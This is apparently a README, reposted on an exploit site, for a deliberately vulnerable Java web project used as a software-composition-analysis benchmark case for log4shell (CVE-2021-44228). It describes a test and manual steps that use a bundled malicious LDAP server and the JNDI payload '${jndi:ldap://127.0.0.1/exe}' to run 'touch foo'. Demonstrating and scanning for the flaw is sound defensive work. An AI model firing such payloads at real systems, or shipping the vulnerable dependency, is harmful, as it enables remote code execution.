## https://sploitus.com/exploit?id=77513684-661F-5D7C-A22D-DA0D7B5DBE92
## log4shell true positive
This is a simple web project with a log4shell vulnerability.
The project defines a simple `scabench.HelloWorldService` get service returning a plain text string `hello world`.
The service does not expect parameters, and if parameters are encountered, an error
is logged.
The vulnerable dependency is [org.apache.logging.log4j:log4j-core:2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1), the vulnerability is [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228).
### Demonstrating the Vulnerability using a Test
This requires unix or macos. It is easy to port this project to windows.
A unit test is provided to demonstrate the vulnerability. The test requires a ldap server providing vulnerable code, the respective executable is provided by the project, it is defined in a separate project [https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept](https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept) based on [https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept).
The test fixture will handle startup and shutdown of the ldap server.
The test will create a file `foo` based on a command encoded embedded in the code of the ldap server the log4j connects to
(`touch foo`). This server can be controlled by an attacker.
To run the test build the project with `mvn test`.
### Demonstrating the Vulnerability running the Application
1. start the embedded web server: `mvn jetty:run`
2. start the included the ldap server: `java -jar dodgy-ldap-server.jar` (the vulnerable copde will download Java code from this server)
3. point the browser to `http://localhost:8080/`, this site contains a pre-populated form with a malicious payload `${jndi:ldap://127.0.0.1/exe}`
4. submit this form
5. this will create a file `foo` on the server
### Running Software Composition Analyses
There are several sh scripts to run different analyses, result resports can be found in `scan-results`.
### Generating the SBOM
The `pom.xml` has a plugin to generate a [SBOM](https://www.cisa.gov/sbom) in [CycloneDX](https://cyclonedx.org/) format.
To do this, run `mvn cyclonedx:makePackageBom`, the SBOM can be found in
`target/` in `json` and `xml` format.